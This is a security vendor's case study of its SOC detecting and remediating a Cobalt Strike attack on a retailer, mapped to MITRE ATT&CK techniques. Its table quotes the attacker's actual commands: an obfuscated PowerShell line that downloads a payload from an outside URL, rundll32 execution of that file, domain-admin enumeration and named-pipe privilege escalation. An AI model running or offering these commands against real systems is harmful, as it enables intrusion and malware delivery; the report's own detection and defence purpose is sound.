MITRE ATT&CK Guides MSP on Cobalt Strike
Threat Mitigation

The Network:  A major retailer with over 2,500 employees and more than 100 stores and distribution centers is supported by an MSP who uncovered a cyber criminal weaponizing the legitimate IT tool Cobalt Strike for malware distribution.

The Expectation:  Protect the retailer’s digital assets and sensitive data to maintain uptime and resiliency by avoiding malicious activity. Enable services like eCommerce that are crucial to retail organizations with supply chain partners and customers around the globe.

The Catch: The analyst at the Security Operations Center (SOC) used the advanced logic in the  EventTracker platform to detect an obfuscated but suspicious PowerShell command. It was then followed by a named pipe command execution for impersonation and privilege escalation. Detailed investigation of the detected sequence showed a Cobalt Strike attack.

Cobalt Strike is an exploit tool used by defenders and hackers alike. It is powerful and flexible at simulating attacks and testing network defenses. Cobalt Strike is available for registration and sale on legitimate websites as well as found on the criminal underground.

The Find:  Netsurion's SOC detected every detail of this malware attack and provided the retailer with detailed remediation recommendations. The analyst uncovered a PowerShell running a dubious alert with a command line argument that appeared very suspicious as the parameter “DOWNLOAD FILE” was split as “D” + “Own” + “LOa” + “Dfi” + “le” to evade known detection controls. The legacy anti-virus was not sufficient to detect this threat tradecraft. Netsurion's SOC analyst also noticed a URL in the command line argument.

Malicious Cobalt Strike Tactics and Techniques in MITRE ATT&CK:

Creator Process Name Suspicious Command Line Argument Comments Tactic Technique MITRE ATT&CK ID
cmd.exe rundll32  b.dll,TstSec 11985756 Suspicious DLL is loaded and '11985756' is parameter passed to 'TstSec' function.Similar commandline arguments are  involved in Cobalt Strike attack as shared by security research firms. Defense Evasion Signed Binary Proxy Execution T1218.011
cmd.exe powershell  -nop -c $ds = ''D'' + ''Own'' + ''LOa'' + ''DfI'' + ''le''; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke (''https://mail.pvpc.org/owa/auth/Current/lo.ttf'', ''C:\Windows\TEMP\ou.ttf'') File with extension .ttf getting downloaded at the location-''C:\Windows\TEMP\ou.ttf". (Windows Defender has detected threat as -'Behavior:Win32/CobaltStrike.H!nri') Command and Control Data Obfuscation T1001
cmd.exe rundll32  C:\Windows\TEMP\ou.ttf,lhdgbmas Highly suspicious activity where rundll32 is loading a non DLL extension file and believed to execute malicious ShellCode. Defense Evasion Signed Binary Proxy Execution T1218.011
rundll32.exe C:\Windows\system32\cmd.exe /C nltest /dclist: Enumeration commands executed Discovery Account Discovery T1087
rundll32.exe C:\Windows\system32\cmd.exe /C net group "Domain admins" /domain Discovery Account Discovery T1087
rundll32.exe C:\Windows\system32\cmd.exe /C nltest /domain_trusts Discovery Account Discovery T1087
rundll32.exe C:\Windows\system32\cmd.exe /C net group "Enterprise admins" /domain Discovery Account Discovery T1087
rundll32.exe C:\Windows\system32\net1  group "Enterprise admins" /domain Discovery Account Discovery T1087
rundll32.exe C:\Windows\system32\net1  group "Domain admins" /domain Discovery Account Discovery T1087
svchost.exe C:\Windows\system32\cmd.exe /c echo a848bdcc925 > \\.\pipe\c20734 Named Pipe command are executed to escalate priviledges(Windows Defender has detected threat as -'HackTool:Win32/Named PipeImpers.A') Privilege Escalation Access Token Manipulation T1134
svchost.exe C:\Windows\system32\cmd.exe /c echo 48e31e1d13a > //./pipe/2d6265">\\.\pipe\2d6265 Privilege Escalation Access Token Manipulation T1134

Observation: On accessing the URL in a controlled sandbox environment, Netsurion detected a file downloaded by the Cobalt Strike Beacon. To check the reputation of the artifact, the SOC analyst uploaded the file to an IP monitoring service, which ranked it as having a poor reputation. Reputation intelligence on IP addresses helps protect users from known malware or connection to suspicious domains that may be hosting phishing attacks or malware.

The Fix: Netsurion's SOC promptly notified the MSP about the detections. Rapid action stopped the further spread of Cobalt Strike. All identified malicious hashes and IP addresses were immediately moved to an unsafe list for process termination on the infected system. The identified Cobalt Strike hashes were then added to EventTracker Threat Center, our threat intelligence repository, to assist in rapid detection across all Netsurion customers.

Recommendations to mitigate this Cobalt Strike malware include:

  • Use strict password management and least privilege access policies
  • Reinforce social engineering and anti-phishing awareness training
  • Identify which systems, applications, and data lakes are mission-critical to your business and day-to-day operations and functions such as billing
  • Implement frequent backups of crucial files and isolate them from local and open networks. Also keep offline backups of data stored in locations inaccessible from infected computers.
  • Promptly patch software and applications and stay on top of vulnerability advisories
  • Implement and practice a digital disaster recovery plan
  • Monitor the attack surface with a 24/7/365 SOC

The EventTracker analyst continued to monitor the network for further infection and possible lateral movement.

The Lesson: With the rise in Ransomware-as-a-Service (RaaS), legitimate tools like Cobalt Strike are gaining traction with cyber criminals. Adversaries will likely continue to use legitimate cybersecurity tools to avoid detection. MSPs must remain vigilant as cyber criminals are persistent and ever evolving. It is also common for attackers to strike the same victims again who’ve demonstrated weak defenses. As a global and objective framework, MITRE ATT&CK is a structured way to learn from real-world adversaries. Netsurion’s Managed Threat Protection offers defense-in-depth coverage and 24/7 monitoring that prevents the spread of this dangerous malware to other systems and devices.